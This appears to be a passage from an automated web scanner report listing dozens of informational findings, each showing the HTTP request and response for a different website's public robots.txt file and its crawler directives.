HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:24:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 07 Nov 2008 23:26:48 GMT
ETag: "16485c3-6b-bf471e00"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/plain

User-Agent: MSIECrawler
Disallow: /

User-agent: Googlebot
Noindex: /goto/

User-agent: *
Disallow: /goto/

27.1072. http://www.memphistn.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.memphistn.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.memphistn.gov

Response

HTTP/1.1 200 OK
Content-Length: 582
Content-Type: text/plain
Last-Modified: Wed, 10 Nov 2004 23:24:00 GMT
Accept-Ranges: bytes
ETag: "29ff35b7cc7c41:7795"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:06:02 GMT
Connection: close

# For domain: http://www.memphistn.gov

# All robots will spider the domain
User-agent: *
Disallow:

User-agent: NG/2.0
Disallow: /

User-agent: *
Disallow: /images/

User-agent: *
Disal
...[SNIP]...

27.1073. http://www.metabolismcalculator.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metabolismcalculator.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metabolismcalculator.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 02:17:06 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-eaeadpcl=968CA510F5691D94C668F576B849CA4F; path=/
Last-Modified: Thu, 08 Jul 2010 17:50:00 GMT
Content-Length: 83

# robots.txt
User-agent: *
Disallow: /
Disallow: /cgi-bin/
Disallow: /startandstop/

27.1074. http://www.metaefficient.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metaefficient.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metaefficient.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:11:23 GMT
Server: Apache
Last-Modified: Tue, 06 Jul 2010 23:58:28 GMT
Accept-Ranges: bytes
Content-Length: 591
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /trackback
Disallow: /comments
Disallow: /category/*/*
Disallow: */trackback
Disallow: */comments
Disallo
...[SNIP]...

27.1075. http://www.metrolinktrains.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metrolinktrains.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metrolinktrains.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:28 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Thu, 29 Oct 2009 19:20:01 GMT
ETag: "18982-2c-cc37ba40"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /
Disallow: /testing

27.1076. http://www.mexat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mexat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mexat.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Last-Modified: Wed, 02 Apr 2003 03:18:51 GMT
ETag: "16b878e-aa-3ba4a5ffe9cc0"
Accept-Ranges: bytes
Content-Length: 170
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: admin.php
Disallow: /admin/
Disallow: /images/
Disallow: /includes/
Disallow: /themes/
Disallow: /blocks/
Disallow: /modules/
Disallow: /language/

27.1077. http://www.mgccc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mgccc.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mgccc.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 08 Apr 2011 16:32:23 GMT
ETag: "708695-da-4a06ac53e13c0"
Accept-Ranges: bytes
Content-Length: 218
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *

Disallow: /Graduation

Disallow: /Templates

Disallow: /sacs

Disallow: /alumni_and_friends

Disallow: /athletics

Disallow: /in_touch

Disallow: /intouch

Disallow: /InTouch

Disallow:
...[SNIP]...

27.1078. http://www.michaelstevenstech.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michaelstevenstech.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.michaelstevenstech.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:31:42 GMT
Server: Apache
Last-Modified: Sat, 13 Dec 2008 10:44:08 GMT
ETag: "1274fc82-9a-494391f8"
Accept-Ranges: bytes
Content-Length: 154
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.1079. http://www.migif.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.migif.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.migif.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:52:37 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

27.1080. http://www.mikescomputerinfo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mikescomputerinfo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mikescomputerinfo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:08 GMT
Server: Apache
Last-Modified: Fri, 12 Nov 2010 21:03:10 GMT
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1081. http://www.military-money-matters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.military-money-matters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.military-money-matters.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:52 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.military-money-matters.com/R0YEPPAE.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow
...[SNIP]...

27.1082. http://www.militarybyowner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.militarybyowner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.militarybyowner.com

Response

HTTP/1.1 200 OK
Content-Length: 30
Content-Type: text/plain
Last-Modified: Fri, 26 Jun 2009 16:13:22 GMT
Accept-Ranges: bytes
ETag: "03da9679f6c91:d74"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:05:25 GMT
Connection: close

User-agent: *
Disallow: /cms/

27.1083. http://www.mindbites.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindbites.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mindbites.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:00:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/2.2.8
Last-Modified: Mon, 11 Jan 2010 20:27:19 GMT
ETag: "4f0036-116-47ce95d2877c0"
Accept-Ranges: bytes
Content-Length: 278
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /author/signup
Disallow: /login
Disallow: /feeds
Disallow: /bugreport
Disallow: /contact
Disallow: /privacy
Disallow: /terms
Disallow: /account/login
Disallow: /404.rhtml
Disal
...[SNIP]...

27.1084. http://www.misquincemag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.misquincemag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.misquincemag.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 678
Content-Type: text/plain
Cache-Control: max-age=600
Date: Wed, 04 May 2011 03:06:40 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...

27.1085. http://www.mixbook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mixbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mixbook.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:11:00 GMT
Content-Type: text/plain
Content-Length: 65
Last-Modified: Fri, 11 Mar 2011 07:49:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-Agent: *
Allow: /
Disallow: /admin/
Disallow: /checkout/

27.1086. http://www.mizunousa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mizunousa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mizunousa.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZJVLOYS192.168.100.186CKQIK; path=/
Date: Wed, 04 May 2011 02:00:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 27 Apr 2011 13:35:29 GMT
ETag: "1b68174-64a-4a1e683956a40"
Accept-Ranges: bytes
Content-Length: 1610
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1087. http://www.mla.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mla.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mla.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:04 GMT
Server: Apache/2.2.16 (Win32) mod_ssl/2.2.16 OpenSSL/0.9.8o
Last-Modified: Wed, 03 Sep 2008 04:30:40 GMT
ETag: "100000001bb04-51-455f64c787112"
Accept-Ranges: bytes
Content-Length: 81
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /LSArchives/
Disallow: /scripts/
Disallow: /ext/



27.1088. http://www.mmatko.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmatko.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mmatko.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:23:57 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Mon, 24 Jan 2011 18:25:36 GMT
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /help-support-mmatko-please-turn-off-your-ad-blocker/

27.1089. http://www.mnsun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mnsun.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mnsun.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Wed, 04 May 2011 01:57:02 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
Real-Hostname: mnsun.com
Content-Length: 1150
Connection: close
X-Cache-Info: cached

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

27.1090. http://www.mobilehomerepair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mobilehomerepair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mobilehomerepair.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
Last-Modified: Mon, 08 Mar 2010 20:02:15 GMT
ETag: "1738c13-3b-4814f8aa03fc0"
Accept-Ranges: bytes
Content-Length: 59
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /control_panel/

27.1091. http://www.mobiletopsoft.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mobiletopsoft.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mobiletopsoft.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:36 GMT
Server: Apache
Last-Modified: Sun, 10 Feb 2008 22:55:59 GMT
ETag: "8abe0-17-ba12fdc0"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1092. http://www.mochimedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mochimedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mochimedia.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 00:59:52 GMT
Content-Type: text/plain
Content-Length: 23
Last-Modified: Thu, 21 Oct 2010 04:40:53 GMT
Connection: close
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.28:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40057
X-Mochi-Source: 10.0.0.239:24013

User-agent: *
Allow: /

27.1093. http://www.mofonetwork.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mofonetwork.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mofonetwork.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:32 GMT
Server: Apache/2.2.9 (FreeBSD) DAV/2 PHP/5.2.8 with Suhosin-Patch
Last-Modified: Wed, 03 Dec 2008 21:34:18 GMT
ETag: "14935bd-2c-45d2b34d20a80"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

27.1094. http://www.momfilm.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.momfilm.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.momfilm.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:50 GMT
Server: Apache
Last-Modified: Tue, 22 Dec 2009 16:17:38 GMT
ETag: "11908c1-33-4b30f122"
Accept-Ranges: bytes
Content-Length: 51
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cgi-bin/
Disallow: /cgi/

27.1095. http://www.monash.edu.au/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.monash.edu.au
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.monash.edu.au

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.2.12
Last-Modified: Mon, 04 Oct 2010 05:18:27 GMT
ETag: "18f003c-ec3-491c3ac95eec0"
Accept-Ranges: bytes
Content-Length: 3779
Connection: close
Content-Type: text/plain

# robots.txt for http://www.monash.edu.au/

User-agent: *
# Added for Dey Alexander. Templates no be indexed. RK dec 2003
Disallow: /staff/web/templates/
#Added for migration access issue 10/9/03 sms#
...[SNIP]...

27.1096. http://www.moneyfactory.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moneyfactory.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moneyfactory.gov

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:47:56 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Tue, 03 May 2011 18:12:26 GMT
ETag: "36c317b-19-4a2631523f793"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1097. http://www.monroecc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.monroecc.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.monroecc.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:56 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /phplive/
Disallow: /emergency/
Disallow: /emergency2/
Disallow: /includes/
Disallow: /htdig/
Disallow: /newsletters/
Disallow: /communities/
Disal
...[SNIP]...

27.1098. http://www.monstersteel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.monstersteel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.monstersteel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:08 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Mon, 26 Jan 2009 23:50:11 GMT
ETag: "1269f88-1003-4616b663532c0"
Accept-Ranges: bytes
Content-Length: 4099
Connection: close
Content-Type: text/plain

###############################
# Disallow: /
# robots.txt file for this website
# addresses all robots by using wild card *
#
User-agent: *

# new ones
Disallow: /action=process
Disallow: /?currency
...[SNIP]...

27.1099. http://www.monstropedia.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.monstropedia.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.monstropedia.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:59:17 GMT
Server: Apache
Last-Modified: Sun, 24 Apr 2011 19:10:41 GMT
Accept-Ranges: bytes
Content-Length: 88
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /monster/Special:Search

Disallow: /monster/Special:Random



27.1100. http://www.mooncostumes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mooncostumes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mooncostumes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:19 GMT
Server: Apache
Last-Modified: Mon, 07 Jun 2010 02:50:42 GMT
ETag: "7e8220-58-48867bd132480"
Accept-Ranges: bytes
Content-Length: 88
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /checkout.html
Sitemap: http://www.mooncostumes.com/sitemap.gz

27.1101. http://www.moreplatformbeds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moreplatformbeds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moreplatformbeds.com

Response

HTTP/1.1 200 OK
Content-Length: 97
Content-Type: text/plain
Last-Modified: Sun, 23 Nov 2008 18:55:07 GMT
Accept-Ranges: bytes
ETag: "ea19e109d4dc91:8cea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:10:28 GMT
Connection: close

User-agent: *
Disallow: /nobot
Disallow: /Common
Disallow: /NoBot
Disallow: /common



27.1102. http://www.morethings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.morethings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.morethings.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:56 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:56:48 GMT
ETag: "59aa21-43-49cd59b0"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain

# Robot.txt generated by SiteStudio
#


User-agent: *
Disallow:


27.1103. http://www.moreyspiers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moreyspiers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moreyspiers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:32:09 GMT
Server: Apache
Last-Modified: Tue, 28 Sep 2010 20:40:18 GMT
ETag: "2ac087-2b-da549080"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /flash/new.php?=*


27.1104. http://www.morphthing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.morphthing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.morphthing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:30:08 GMT
Server: Apache
Last-Modified: Sun, 04 Jan 2009 15:05:19 GMT
ETag: "64028a-7e-45fa980a129c0"
Accept-Ranges: bytes
Content-Length: 126
Cache-Control: max-age=31104000
Expires: Sat, 28 Apr 2012 02:30:08 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Fasterfox
Disallow: /

User-agent: *
Disallow: /morph
Disallow: /showimage

User-agent: Googlebot-Image
Disallow:

27.1105. http://www.mortgagecalculator.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mortgagecalculator.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mortgagecalculator.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:48:15 GMT
Server: Apache/2
Last-Modified: Wed, 14 Oct 2009 19:27:24 GMT
ETag: "448881-20-475ea2700bf00"
Accept-Ranges: bytes
Content-Length: 32
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /lt.php

27.1106. http://www.motion-vr.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motion-vr.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.motion-vr.net

Response

HTTP/1.1 200 OK
Content-Length: 245
Content-Type: text/plain
Last-Modified: Sat, 02 Feb 2008 04:45:27 GMT
Accept-Ranges: bytes
ETag: "f0c5646e5665c81:3ac6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:12:05 GMT
Connection: close

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Di
...[SNIP]...

27.1107. http://www.motivano.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivano.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.motivano.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Tue, 12 Oct 2010 16:53:53 GMT
Accept-Ranges: bytes
ETag: "40aa8cd2e6acb1:fe2"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:23:09 GMT
Connection: close

...User-agent: *
Allow: /

27.1108. http://www.motivationinaminute.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivationinaminute.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.motivationinaminute.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 17:23:41 GMT
ETag: "af8382-640-49c91c67b4140"
Accept-Ranges: bytes
Content-Length: 1600
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1109. http://www.motorracingnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motorracingnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.motorracingnetwork.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 18 Dec 2010 16:20:13 GMT
Accept-Ranges: bytes
ETag: "d6d83773cf9ecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 158
Cache-Control: max-age=603875
Date: Wed, 04 May 2011 03:23:22 GMT
Connection: close

# Robots TXT for all Sites
User-agent: * # allow all bots
Disallow: # nothing is blocked at this time
Crawl-delay: 30 # lets hold their toes for 30 seconds

27.1110. http://www.mowerpartpros.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mowerpartpros.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mowerpartpros.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 18 Apr 2011 21:14:04 GMT
Accept-Ranges: bytes
ETag: "2af218cdfecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:00:13 GMT
Connection: close
Content-Length: 460

User-agent: ShopWiki
Disallow: /
User-agent: IRLbot
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-Agent: OmniExplorer_Bot
Disallow: /
User-Agent: twiceler
Disallow: /
User-Agent:
...[SNIP]...

27.1111. http://www.mpsaz.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mpsaz.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mpsaz.org

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3404728484"
Last-Modified: Mon, 04 Apr 2011 19:17:21 GMT
Content-Length: 38
Connection: close
Date: Wed, 04 May 2011 00:52:02 GMT
Server: lighttpd/1.4.28

User-agent: *
Disallow: /upupdowndown/

27.1112. http://www.mpt.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mpt.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mpt.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:04 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.15 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 27 Oct 2009 18:41:02 GMT
ETag: "18262ed-66d-476ef051eab80"
